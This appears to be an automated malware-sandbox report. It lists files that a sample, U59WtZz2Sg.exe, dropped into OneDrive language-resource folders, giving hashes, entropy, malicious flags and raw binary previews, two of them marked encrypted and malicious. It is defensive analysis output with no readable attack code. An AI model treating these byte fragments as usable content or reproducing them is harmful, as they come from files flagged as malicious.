SHA-512:	4A0209E4A2FEBE59C3420B68BEBE4C664188CCF28B404C8234DB7BD822FDF6AF573CE4987B4FF3F609B27114111321F634EE541213A7D77B2D8726A944FBBEAE
Malicious:	false
Reputation:	unknown
Preview:	MZ.....J{.q.`.e:.q/..5........r...S.P.b?aX...(.X.%"R..+6.4.._Fo.:..'.:..C).oH...D...._Q..3j.".{..9.F.+.Ii...yk8.'....G.@.......C..s.z.%..jl...).....+N.~.1....\X......u......v..k.5B...!..5.H.;.1j......S..V.?5.C-..\|...S.........=6.c..S.O".....m....,a.O....c..\.l.{....Z.(ASO._.3..P...,.....k...VP....O..y.j.+...K...........\8..%Y...12......-..~w .Q.o[.R.7...?}.8......}4..f!r...s....x.I........c...3.%.....lc.[{..+..U.-Pz.....0Pl...Bm....7..1........hL.V& ..B^...\_....6.D...Q...t?.#..4.9..s}.[m....C.(A.A.. .4fg.{.A.#,...:.nzl......;.\[._.?.8...$.O9...^....Q....C&.Y..6.p...Q....D..........^.V."2...0...>.D\E..-..~..~".......Y._..tI......zz]../.4T..Y.3...f..}~...py.g..LB..<....'F8....j..`.2...(.~...D..e.o$.....a...!x.....n.P..\|.D.gF..{I..F......r..H.8..p.D......< m.......PES..h....._0o....~..9R...}y".h..k.L.O.\|..@....L4.p.X/.-.W..v.W..6.\|.a.2..z.YH<g.[uuu.K.5..UQE.b.oL.....gFP`...f.2@.".k....;.w.......Q\|H.\K.d.,.I##.MQ.1h.`HGM*oN.yx..7...?

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	121470
Entropy (8bit):	7.998527766087857
Encrypted:	true
SSDEEP:	3072:M6f516blQwmR7R/oXDH6XG4d+cLVqxJujeOWKQ:fxdTboXDH6L8bEjXW1
MD5:	223EB02AEB5C0F2B258840A124A5DCFB
SHA1:	654A2FAD3A29200AC30211BBFB57AEF9247EDCB5
SHA-256:	1DF02364188AB0E8AABA2D30F8EE9BEEA6E3B752A8E71B8A300ED6B2CA672CE7
SHA-512:	50CE04CE7924BE033C7EEDD645FA43C5A3037C4B45F74319BEADA2996FF48D0C8A452C0ADEAA619C9154D5CEC07F70F36DFE2C110F9F1D1B30E2B43322FF9D1B
Malicious:	true
Reputation:	unknown
Preview:	MZ...u.;k....C.....Nr..!.+RA. .\|... .!...1.e...g.S.gn$.=.Ue..R+...z..M..~..\Is..$.B.\C].PJL.5..U#..{wEH....+...1...+v....1L.D=....x./.dn.R.\|fnGI...a.`.k$..O..A....9+_V...s.../;.d...6#z..U..c.g.j7..X..5C..&8.c....;G?.g...F..#....Bh.T...>..s..U 5.v....`..6.Q.,Q..3.:.}rHA.. ...@e..]...E.6$..`....E....=.!.[=......M....n....II.%=.&..'vI..E.38....3f....zs.!`r[s...a..$.?Vyt....cv".9......L......#..qg(..i..jZ.+........X.1..V.+\|.....r.y.n..+.1.......T.U........F.C.N...y.E...aR......1.".......3...d......q.t.D...G.@n+r..yw.b..V..h.T.....7.e"VM....-.+&......h......s.P.N..N..+FR..,..r1..m..\.b...g .2......G.......v.c.?.!,.e........k.j^.ly..<......$...Ag.~.....d......].......E....(w&\|c...1I....T...{.F..7..p.........X%.g4......B....W.B.@..E..r..N..Q....6.mD.z.......s.7I.E.Q..y?,D}a.........J..S/b.....pw..z7...9.).<.....`+W...... ... D.K..ZE.9...w.=x..~[E:.?........L.{.'S6x0.0... .....MIo.93a..%...V1.N\E..ev....p2w.M..6Nxo...FD.Z~..o...&!.W......)y.{

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	196526
Entropy (8bit):	7.791594718780446
Encrypted:	false
SSDEEP:	3072:6A+5Bsi78LO2Z1/J3ZJdyxGNwrO7RV0hsO1zIR/UQXTPBtZa9M+rZ3UUo8riza8O:6fBsioi2ZvpJz2YRq3cOoTPBi7r5KBO
MD5:	C303BD0F5AA3A99771A95D3E8848884D
SHA1:	D1DB553FCAFBCADFF5FB78C73376B0F6BDFB4DDA
SHA-256:	7FAE04BDD8A0BCBB2DD0495EFCC921F40077F65620C6E8A54B4B2D15EFDAE4FA
SHA-512:	ECC3B084B3CAD9C2AD6FC665FEECEF4157118848D94D21363D6C2E5674C287AB0643C4CF7D206D98EB3A6581AAFF3EF0C4401793407AD0E011D21E788B75D7A9
Malicious:	false
Reputation:	unknown
Preview:	MZ....<..CK#..%.r.a.M..[....fl...QO..Uks..1.g......-..D.:1..r0.H.gW...C%E.).`.....g.y....^.t.[].Q+...z`.\|b...V...@...[...5.n.!..90=B..y.l.....9...>%.gsq...z6...e(\....r..V/...a....h.....!?..9.....1.- .....6....9sl%.z.$....}fS..u..IM...B.......3k(. ..._x.....k.H..Jf.x.]....;qdE+H.....I0..<....0Zhc..Yb<&..l..w[].O@s..2.....x;...%.....+./4.........B..Sc0.y.Q..H..@4pz..'..KK..+.z.....U.H.8hQ..G......ar.]s.vD..G."l..%..$..j.-$UX."..aX.(.(=.../b9.Y:...z..h.Bq.S...........P..+.ju9...V;.<...%]F..~...Vx7.../>....;X-.M..;..-j.......J. ..W.f..`3\...lZ..9........e..:'!...#N..h..R...;^V..XQb..f..}...P.R;eI9t.lw3..d....e .........\......p[..N.)..}.4..i.GO..E.....x...Z.m............d.0...[..l..D.nDup.=..B.^.%....`..i..j..9..]H...;d.._.a?".......0sb..I{A..."..T.`j&#...j..V5.R.g=...b..........7S.gA....W..2.X...9..9;.g,#e&O.0.l...JHKx..1...p..cV..F.q..p...:...g.v\|..Y....N.!?..5..*} ........n9.......R.PW..G~.hY..D.......eu......y...Y;.:^Q...H...}j

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	165294
Entropy (8bit):	7.993832155822207
Encrypted:	true
SSDEEP:	3072:+WlWW5+XdzrdkKR2V4QA5wfAI1gWC7qYztF+wHTjHqtLcaQduIkN3Jpd:+IEdndn2VQ2AI2pzz+6TjKaaguIkN3x
MD5:	45F364F04FA186FB0AEBAE4BC599B54C
SHA1:	F932A99D5BFC3D67EA7C70050834F4BCDFE91BDD
SHA-256:	33E21DB4A2F53FD93A74D0F90DBC0207715D3837C2DAF6E93EEDC7D7D332FC76
SHA-512:	B644D1F649B8ACA01E37EF31EDA778A31ADFAEABF79D78520F32C35A715B083493C74CE519B4B26E0E6C7D93E35DB1B0501B9C1390768E38AD3D7F2C3B2B8B39
Malicious:	true
Reputation:	unknown
Preview:	MZ.........@.M.&....m..`..Ur..qM....tv.9.......i......B:.E.7...2f_.4...,....X...U......".......4..6R\|hZ....t... mM}.z..chlv5M...g..J..!z4..(F+.l....H-%>x..VR..{.....9.....U.._,.U.z<.{..../.. .m..Q.........;([C.j......7uJq...9..}o...X..rM..6...e.K.e.w.D...k.F..l^.tR4hn..#s.Py...T:a........2t.6.lt.D.6rj..E\K....t......dJX....^.E..{R.Q0.A...\!..%...S.Rf.r....$:..7~...c.H..@.......c.T....@7.<.f.... ..RCF....0.$A.V..D$...e'.?.@..J....s..".Y..v.......a.G.A..d..[....h....Z..=...`...d....#,...;..../&qX...5oD.(.z..s...._d.#.a9Y.3....`.&......w.........<3.6....u...I..'.......u../....n....5<K.....{:8.-..E..u`.o2....9T.#'7.F.[8.."...36...I.S...wW6r.....).......Q"AC...]..,....n.oG...z..xh.=.YE>Sl..-......Y.5.Y.W...&.l?....#U.m@...~.H.IR.61.0..d.............x[~..l.............1..q..zN.B..s..3.f.`c.n.9...T.m!.F......2:.P.Y..@........e.i...].v].(a..\|..o.............'....>?.......R...".X.V....Z.K..Z.Z.4...M...d.c......nu.t.:A90..b..}D.Hp...?..?.5.re.fY..}J.%.b

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	202878
Entropy (8bit):	7.729038757581182
Encrypted:	false
SSDEEP:	3072:OD4zYkeg8xe05y03CK27aqBamXPnvYlCpFdkgs0IGmmtC+Azid:lebe0d3H2GcaUnvYlCpps0lZPd
MD5:	85E6CF7F2AA9BBCFC30A3892D3ADB3C8
SHA1:	0AE38B6699D08C267DD1A18C400B77CD523C80F1
SHA-256:	39F6AE75123CD483431A0F75597535439DEB313D3852A791132FF4004D20FBDB
SHA-512:	9ED379143EE7C1DD766E12E2E2742A367E1E1FB00675650291B7F91F31DBFA71FD1F02AED4E63E83EC8BED4C72724F63412390D6C13B3C1BB54F691AE9E45456
Malicious:	false
Reputation:	unknown
Preview:	MZ........ kq...".0..g.n...W.......V .........}.......q..Bp............{.`q$...C....$ZC..[GV.d....rk..F.K.b!...qs...h..p..Z.0.i....+fe..2...C...,.J0.#..7....'...P.xJ+.d=cu+..r< 8[...:.ik.v.y.'...A..l..-......iU.....y.@......}x[ ...Rl....4d....... .V.z.<....Hj.......=..TC..Z..xcDM...."`..)...M.....C...=..8...E...>._..._.Cp..6...!0Q7....-;(EE...&.xh.. e...,.O!..7c.....TtE..6?].U....I.2..g\...@.2.9.f.G].....}^D..%3)-...%.{...r.L...]....V....n.\|...Db.nT......\..Z...5g.%.y.Y....Zu...i.....D0..w.E..m...gF....,T..~..#:..`...n/....DJC...s%.".[.x.T_.#.s.N{....+.....^y...H......x.R^....K.5.o.`...c.....r......wK.1.P..%.....yn.)......C...!/......7...6..u..8...f..+...p....G({U..h..O..b...@..;.d.Wr..^.%.N...,.1.........P.zNR.;S?4...&j..!.6s:,t:.X..cnU.k.?``.....R.4...n..._..3...c0......-...(...........Q#..v.'}TfP3..!A...........$..!.0.k.}L..j.T.....P`*.JL...j..,...~...]\|qS..L.h.>}..<W...mb.f.e......P{.o+.p4n....;.8.M_....$.F...$./.......;Y......g

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	219774
Entropy (8bit):	7.4642902213862
Encrypted:	false
SSDEEP:	3072:3sy/McQ6UogJ6wccR8lhycRQyVEXGJaYcIV3YoQBL6GcAAxQB2BJ7fgpN4UNysNl:jEBowccRgQIQySXtbdNoGcAS2
MD5:	C6471F249682B99A9651A0B0263E721E
SHA1:	1E6AF750C75A79485720876A04373EA7BEF82D2C
SHA-256:	E190BA77D6972A16C8A078F8D837A7341DADBF130D1A2E42F6E8ECFBC71AD4AA
SHA-512:	4A6E6FD7DC43A4DE7DEC6C1DAC962FBBE6E3221AD6BF430B1C4F32870A8F72A4BC7003F6F8AA143892539A4BB1A904AA2626E856ECC4BB40C2C66DEBA572A05A
Malicious:	false
Reputation:	unknown
Preview:	MZ...'..l.D.ek<....>._.............I9.qet..o.l.h..l.?..=..........,.=...h.`.rb..C...%to.5....H.1...P_......Gi.#....~..+7E/kB..!..t1.<b.X..E.$...J...+..xX.\|....TE.-..H..}L....05. .....\|.UB.$.fj....O....`p.....#..Y..)}......j....@......S....{...6#\|a..aR3\..,...^D..K..{...0v...K..DT0.C....C.\|H....u.-..M.im....&...K...,....t.Ew.W$3.B?.u.......$..O.R.c&.f....?.}.d...p...&l.v.."..W.+....8g.f...)y..0.e.3..O<.B...2S...2.....c....z...t......}.+.......6-A..+...H.)E...qu<..<....}.e..:..C...P.~...........Y...O8.~<..z.6...b.{.p.On.#V.u....2x^.b..h}......"pd.-\.aY.g....S..t......4..Z/..hJ.....y.,...R(.u.u5....yK..t.WT.j....;.o..g.o9...qs...9.zYb..~...4&q.F.@.C\|...g..'.Yn.x...L..p.....2t,+.\|z...,Y.."3...X.F..8\..8................B.M.ppG.2.uY-.M.K.p.\|.>.....3wN.....mo.!<..V-..cW..z...O......`.......M.h.v....u.... w.B.:..t.E.,...._..}.{u..q....zY.9.hE..&,....p...#..W.M!....V...1.A<...%MI..=M...-l7y37,....Wd....I.~sbZ..#.A...?G.ZX..3..j..W......X.N..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	206254
Entropy (8bit):	7.638387768573505
Encrypted:	false
SSDEEP:	6144:nu/uXVQLeri4iL0KDQyV7yHLfCFvtzFhYUe:uFL54+D1BumzFhBe
MD5:	5334A37AF91D633D1A6008549AC6359E
SHA1:	05AC5B9CA321F5FF0F10C28669979C79E168EE5F
SHA-256:	D391337EA7EB7E380DDB3DBF9D294BC3BD981AD6AF051403770636330D63D582
SHA-512:	5845E63A33E24295F82CF69628949B93248876E5C0B437FBC1A85FE57EA6E920D1E9A54469ABA0AFF5DD1DF8811D948DB8FAD0E9A97A44450638076962CC45BC
Malicious:	false
Reputation:	unknown
Preview:	MZ...HW....bl.5a...W&.p..{\|f.9.%.`.=.,..K.....=.J}..]C..SGoh.......N..s.wI...6.K.....!..P.y.".d3.s.Q.A....\|ai@jV>......Y..l..v.cC!.C..VDIj.Lp.U..\|.dKUk...Fcu...[.....n.0.J..Y....99Z.<.N..({...t.9..T_Y.Y]].~....Q.\.B..S.lw.y.....K.d....U.,w.@.e..W..).8..'\|G..%.....P.`(?...E~CB.e.s....A..?x.....I.4.!.. r.t.V'a....>....LH.+.!.Y.h0+.Q..5...Ek;.D..<.d.j9...4po.O...'0....oQ..>.......?...>ui..~sWg..p........B..N...K..p..k.E.bF.....'rL.f.......rZ......f.[W.j.E;..K.GQYe.d.~L..H....a.[.jg_...<..+5.m.)KYF...}.......&._@..#..,......\|.s.u.T2.T_..6.....E.1f..sd.4[..;olx4.AQ...BKH...b_)d.......(#..+....aF........m}..".N4....!...b.E.......e.X.>lh=.E..o.n.g.Y.b..X.B.6.e..c....I....'.....F.:........G....)e..;....,...W1......Mx..........._....;.."5 .}y...)..6..........]FP....?..U..AvkG..=?v.5. .YfnB..O..;.$...C\/.o!.z..%........;..TV..\|._Y. .I...d......8.Oc...g.U.....R.F.."M..w.'<.k.H..H.m..C.....&,....7......d...f..6z.`..T.[G.....\.+.X6..&....(n.$

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	201854
Entropy (8bit):	7.693531311615289
Encrypted:	false
SSDEEP:	3072:KkAYNDRQrTM5pNDiAA+KGuGunfFPmD9ypjfpD0I146k6Gr5sqiiy8g/zqKibbm6f:k0HN0jGuTuD9CfN7e2qZK/Q3p
MD5:	CA4AD98D280C6DB611680715AAD111C9
SHA1:	BA530BDC6AC9CF9285FF6F69D5FB05ACC5604E97
SHA-256:	E046F14A2CF529D76595A8EA4B2186065E03848DA56671DF5617B52CC24E7513
SHA-512:	C2B71EC208A749B784532257F8E21FE320D0C36B4E722DD46D7E800679A01B4B16239555129BFD4A16C77B184112B8F368E4E3ABAB95F3736440BA615BD7D3EC
Malicious:	false
Reputation:	unknown
Preview:	MZ....E..Wd.7.[..J...2{.q..zX\|.......U#..8......I.....A.f.}......V.....<8v....'.Gi....^...5GTe..0.....2......2.-.....I\3.-.2E.^Z../.>..........!.......x.....S.kK.......E.....".7...3Y..@...+./...p...U..m. G.H..&..x&......t....J......#....6.,h.I.r\|9..RU.....J.3..I.lX.[`.....r....g..e..G.....7`.N.E...Q+]..R^`..zD..4{_.zg...gz`h..}..."..bX......V.b....RI.=....{...._........7......~...l.t..1..B.....%..[..h7.R(-...hiM...<Y.G..."...NP..4].4..E..}.C&@.6......#..R....E......w,.`.5y..BB.&c\../..u$.o..I..m..Nr(\.).....I...5k.bns.W.A.Gr...N\|q.A, ...o..?.D...T........V...D..(..$.S8.+o.1Oj9.\..;<.1.i.....W.....u`4ew..m+. iGAClPy..........w..k..E.$.%W.:HLy.3x.\|....k...^#...9I..nD./..a..dJu......7..r..F .oC..!.E8?'.'t59AI.3..7vuD.}.r..Yc....dP......[+Z3..l.."GA...A.:..y-.f.U.,.................[nz...=T!..+.]aB7..$.]..Tz>.\|.Ga)m.S1.......#......+..dB...:R.{....e..."._.YN.$..+.5..E.........`/%Mu..d.D.Sm.......>h.V&2."....g.....ef\|H.......g}..`..X..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	196230
Entropy (8bit):	7.745206779570095
Encrypted:	false
SSDEEP:	3072:QNEmKu1n1i+/PbTpeYjFYDDWKYBJ5OtYKoAJAVx223OKd2xZEFZkzN7ORAQ3GhYa:QTKuXLfpeYjyDDW3JoYKfx23OKuhCchX
MD5:	9D3F43F6C1351FCEB38EDA1FEDDA77C7
SHA1:	76E28969429A12C2AB2244CB198C45CE3E3A0626
SHA-256:	66DDF1512F992D360AEE5DA692C146748FBF47041E836A043D4BB1C78E385013
SHA-512:	4CBEC33CEC41E80A7CB72E7EA6EF4D791DDBAA6472814C858CAD8BE200DB6DB00F9389081983F49ABC13509FE90F0A5DB132E4DFCF434195EF9A324546E68E07
Malicious:	false
Reputation:	unknown
Preview:	MZ....O.j$........f.q.<.I..hY..u....!7..}...Xp J\|..xZ.`.P...y.kC.u5"...u...YY.z..E.!.s^...Y..U..:d^.ruF...^...aQ.O.B@b!...g.4,...c......=lB......1.sx.L.x....2`maZD.D.#U2w...&.i<pw..D.z...U.3....M.....x..`........\....o/..eK...N.k.oYtr9No.K.f..f.B.XV^..5}....).C...)(W.f..,..N.....G.(D...0.JD)@b..g......(z._..\T.6.......kvQ.....0.E..E .U..."v"\..R_..(../(,1=y_..`h....I.C.6Pb..!o C.....Q.a..7...6.T. .[.A.R...\..W...:...o...;.]`L..`...R.}.~k..]ov..j..#D.`...d..z....=Z}L...._.\|"..g#.....u.........b.~....X.5..V..U.......h.Fl..N...BF@.}......l..b.&..D.o..bK...?..J...s+[".P....}..W..g..!8..z.XF?.GF...7T.Fy...!...5..+J.fP......._r..t.}V....1....<.3k.yICC.....@N.....uY..Y.kF.....X...+..K...............J.eO.C.N....,.$]...8.`f..I.......!K.3,.b0.S.>..o;m....8"..(a...=.o.(..g.z\|qI.%fM.1~H@H.....o....U ;.....^...F...O..fNv[.9..am...f..ML.N........d.#\|.{...p......%.......nTz.q...d..k.e-.......oq.....~.ri.oZ.,W....G4.3!.=.......r.L... .a....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	208518
Entropy (8bit):	7.665483651980089
Encrypted:	false
SSDEEP:	3072:c+kmiwLqkTw7VO0uIRnmCd96VeyKUG1iQJN087/NYURGaq0ZMWqJv3BiA/B:c+5SRnm0UeyKUG1DH5YUrq0wJ
MD5:	5F08280379726E762D5895902428FD5F
SHA1:	AF5C6301221E25F01D7A542D298F1C0E3525BB36
SHA-256:	E019A9EF9DB44C6F8D2F405A4F55D3E1C792237991FBD2A42EC9BDF08AFD5C02
SHA-512:	760989161750DC7F3025D54A87821BA6355547AC6F1D550106CE07284E98612B868EEB2ED086B8029DB5087FFC66B3821F71B6B47F4D8EF295C63678858E8ED3
Malicious:	false
Reputation:	unknown
Preview:	MZ.......~................C....6{.....j8i...WI..RF.t...<.k...H.7T.\v...r.G.b4f...YN.)@......9....b.#.~1..........z...v....V.Xz.u"X~I.........4...=M1/...).f;#jiCI.i...v..F.Y~............lHa...6..H.../.n./.........M..`eG.=.}m....E=..A.......xw....00.".D..p...CG.qa..<r(...;...AL..6..+...4X!.}S.{5........>.0H;$..f._......#E.=V6.....9...<4..I.].E\|....W-.s.....e...O?R./..}...c.(3.SsW..:.....h...I.....(n.M Q_...f......W.#HYw)..H.$......!.,&B?...i...........g..`.q......Y.g3D...V. .. c\......rG.g..!......yy...p..ny <)0.gL......V$..5..a&....P\.i#........B......W...+;..tR.....B+P....X. 7$b@j...Tz.S.DA....C..m.,.e...LhB.=.1.y._..+-.....M0...dt.........".......8.U?...`..?d@...1v.x.+.3.\j7R....6.....{.....f..p\|v7..../i7ED.t.Y%rp..8rim.7y...o..e...2"SG.D....?...Y.l.....2..\|...V..>...w._&j@..C.5X.O......cV<t.!.Y?...X..w.4...j..i...............$..E..H....!.t....}.v....o[.../....&.........f.80...A.......i.j-. .X..li.........,.K?+:y.&.Q#..&k4.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	222854
Entropy (8bit):	7.534551619563658
Encrypted:	false
SSDEEP:	3072:oi1RJHcm1YtGn8Fgo6QClGYt7By8CEdyyybB75YG3QKS2QoJpVQSZzxtmQGpczGh:ogL72tGn8FgHQ+BtY55Yz2QoPryQGp64
MD5:	F23C7B88A8B90DCFFDE9E36887330862
SHA1:	5D0622A1923EC71897EAC8250098F212DA8D0967
SHA-256:	4BD89EAF9F639F3A9C4AF4BD26A915978BC4A4644D7312E06D8F38AD0E53FD96
SHA-512:	7662EDF34C6FF9664CABAE75A11EC019F79D4623810F8C4B4632C8BB7DC2455A00D488E914A65CFAA17EADB2F43D8C0A66DA2AD2B90537C06F3434DEF914868F
Malicious:	false
Reputation:	unknown
Preview:	MZ...."gX^?.Hm.TD..)r"....]...Q5+..pvG+...77$....D.x+...W.t.6..S....7.~Wm./.F.y.u.-a......O....4..r.._....n.pL.....,.h.n.2...@V?..0.,C......Ja.FF.l...HK..%..".._h'....0i2.&.x.$.0..4W..U.1.CT.G.e..Qj1...C.a...).....v...W...TC......H...`{f2....-..?O.].I.c).`.r..m...k.Rp.;.J./eaZ..a\|...'. .-.z.I...1.....N#h...G...........^...5.b.._.....D...m..",.V...@..K7x....U...pDc..k.O..k....p.s.....9.....4..%R.@...Y2W.`l....0'.^1...3.:MH............hG..........<~.p.s..DaV.._p..j.V..~...Y.&..##yc{.w({`%.4.t..MO5...r.,..y....j.F..<!S.9...T.KV]Z.!...a..cb.....#.........._0...E1...P..'.....LnJ.....D..o......`..{X:;8CV)....f.=.......iR@-.....v...m.Yo}.....Rj.......i.j..@...5.UAQ:9.e....L... ..c...:..aU)Y.=....`....B..h..k<z..I....'f..r...T..TUb....8+X.U....,.....(.G^S..O..O..&...84.?....B.X...RB(...3._.t.d.@.x....qi...XF.}.@.........~..e......M..a9..W........&....G#..Ek.......k.....\|.i...;z{..2d.@..0.....w...t:pu.i...Q#/>.8.X...e.g...,.+......a.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	201342
Entropy (8bit):	7.741830101603431
Encrypted:	false
SSDEEP:	3072:MN9zO+kHWBqDcsArVyHCeaRyPM6j4vrSkO6YHQom8DG2fPOcA4mT:MNZO+k2BqIsAByHv268viH3m8idT
MD5:	2CA61469BEE1DAA00A2F62E6DA58A32F
SHA1:	4CF8DD90C61816DC04437CB540EE9F5F6972268C
SHA-256:	38B3A19025D0B8AD1A8475AA1D55FE93CA209A5ED60DB35C79D6D5A888F9148D
SHA-512:	46E1723BE8E7D1602942574E3D7456512B0CA27EECA8B923CFE4F42BEFB3E6CAB7198002B0B3A813D6CBF29099C9E6168AB3B5BC6706BC53080AF789040D1245
Malicious:	false
Reputation:	unknown
Preview:	MZ...Sc#`$......(..y.&[. .....tg...s.s...."...0PK.._...z.k..6.+.#...W.7%....kK.p.H+.B. ..".]_.j= .+...ko0.....O.....u....._...W..Gvv.......%.C.....!.J.N1].!.R...".........UN..h;...u.B.k....G...6..4T..$,X...?`3...s..Q^Lz.......`J."Ur....a.....h.0.)J..+..-.s..k. ..@....^...\|r............0K2...y.T.yA.......5!..$.>.ub ...4..8..j!h..r1/S.....].......2.T....d..#..c.....<w...y9...U.#..3.@q$... ..L.m....q<.v.?.O..M\|...R....}dO0...6.2.p9.A.u...e/.!.h...W..H.......?..q..e.......%H.......6Dq...6..'.2.E..4.5....s.E.<........2t..E...........@..`f..I..c..J.A...#.....0..6..l~..1...3W..........N.N.9=UG.6.}%...r.,.`sI...;.."=jA..c...E.f.. .b.N..'.._..m/.7.../.X.7....3..l.....zg.6.q...s...c.I..Q...`.s....t.!..y.`Vo....`f..6.^..p..".r.8.......tC..u#..).=.f..A[x...=..co.'P...>..HK2.Xs....I.)...eZ.L.E.=..>"..p.A<.H..K..4.3.@.;<.2.o......B.[...>.?.;~.9...B..`]."..j..b...1........yF...'`lEj.YxC.q.:.].v..?.}...{..C..^.u.vr.t_..EH........i..b4*+..dK..tF.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	200326
Entropy (8bit):	7.760863063735106
Encrypted:	false
SSDEEP:	3072:k1EH1cPMSSYrvwrGZe71V2JBBEFJhmlHXJPtA+PUMytgFh:kMG0SXroGZe7SMetJdLh
MD5:	59D58E56F11F79D5D4244AA79A6431FD
SHA1:	24ABF572611B4592474777CC3D7A19A94EC8979F
SHA-256:	883EB4ADC62A7EB31E87EB66CA6E22D909CCB9719DF248F75970275D6B418525
SHA-512:	953E5BC56FB0E0E2E20B8E9ECA0BA90E40A5D1CB46066C7E82D5D7F3681B2796A5DA983EEBE04060E223868B455D07A53B903E8946944848BC4E100A8B5A5F2E
Malicious:	false
Reputation:	unknown
Preview:	MZ...5a.KL=....C....&........p.~z..J..-l.y...W..q...7..O.......6Q.......=a>.1m.E....w.~.{u.u.(..A)...6...+.9^..5n....+.7:.a...XZ.=...IB....)...h..X.l~x{.b.g..I...VN...ruo.&!.y..p.8..3...{[k.t.X..!.Lc..v....+.y...Z.......B..u..(3...?.f..[.Vj\|....N...r..K..Jfx..X/x.v@...X..Y..........r..u...JO...._..F"E....P<..=>.1..5.{.....\.....2qT..m.b...>.5.,.^..L..GH..../........g.`..Z.~.WV&$A...n...6S.../.....b...]/..g3..C#06.vr.X.%.&.........1"I..]...\|Ec...........r;.....\|n.......V..68..qx.^....rM..b......=~.T..Ze.x.....K..15.<.[...{....gS...E.*.p..v.....x...^5-.]..bE..I9.B...K.5..Z..U.+W..k.......+a...L...#..&.P.I[..z..GG.O9...v..(.7$SG....&..t}.......H.d.vp...d..F..t $.xxL.!..x.Q......../..~....=#...........W;!.k.-U`.4.J<..l.......2.[Dz.W.'.\.s.~.x.'7\|s...~........6;o5S(...,..#.E]n.u.f.Q..]...r.7..,....7`\|n<.n.i9TH.G....v.......C.'...W...........H..r.#]..........{..~..YU...&.^{.h..+.g9d..x.......#.w./"..<E{\|.....}#.74P.)...h..j.@6t.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205950
Entropy (8bit):	7.620605421139491
Encrypted:	false
SSDEEP:	6144:KPTKbEdbUksG9iU3lASBkoKyiNaNlPKlJNA:KLKbEP9RlahwNZK5A
MD5:	F37B08755525325D96500992A8D61A29
SHA1:	14D0EFE0EE8DF4F69CBEE74452B8BA4A0431A8C4
SHA-256:	B2E07A681815E79919A76665790DFD564DC8706E3870A55465E5F15F911924B4
SHA-512:	666047471E3CFB7BE530804E34AD4081C486DB427482AD3F429B00CBB2B5B4F13A56EA43DFA36B989E893CBF978DAEEDF37CF0B1BDA9B629EA5FEE916A4D27E6
Malicious:	false
Reputation:	unknown
Preview:	MZ...U/.X.yt=...1..T]\.h...K.ui.......#.BV^.![!.5.........A..m.i.{T...1g..ztM..@.o...G5rt[w..o.-:;.e%..?...H.U.W.......Cz..[.L..C......,.Y.F...S....8..k(.>..p...5.^z.....R.!..}DG.....5e.n6....g.....K....?D.L/."!X%....g.<.Mn=.n..M...9GE...-......`)~....._..C.9.E..e..~t..df_i1..+..L.......nu.G..u!...B6,..S.:..c.Be...ml.~\.o.d..y..E.h......N..J.....+L.R.h..D"R+..q.Z.\M.mp..H.8.._k@c....M..Z.,.!.)!.^...J.....6..5.&.....K....^....^@3.....;..?hP.%f...........o.)z.fk.}X~./....L...k..y..u'..X......l.C.&........E._.g..g..(PWQ.iF). l....-l..#.....4j)N.=.5W...T....R.........HA.[.m(..........E.......g....`..w).y"5tl._p.k..][...W9.0.o......N...`h..K(.mX.j...C.v...o._....9j..~...x...I.QZ.....N.6.m....c.Ss..v.Kw?@.....P....a..3.`....9..Xh.<...F....K.M......:..h.@....L.X.; @.rm....S}.<.....ILh..#...M.="..J.S.$..o....}.vj$..&...^.........IB....X......o......W....+..$......G..M...\|....!~..TK..e...(.......:&...Nv_.j.....I.....E....OT...Z+.,1.%.5X+"C.X

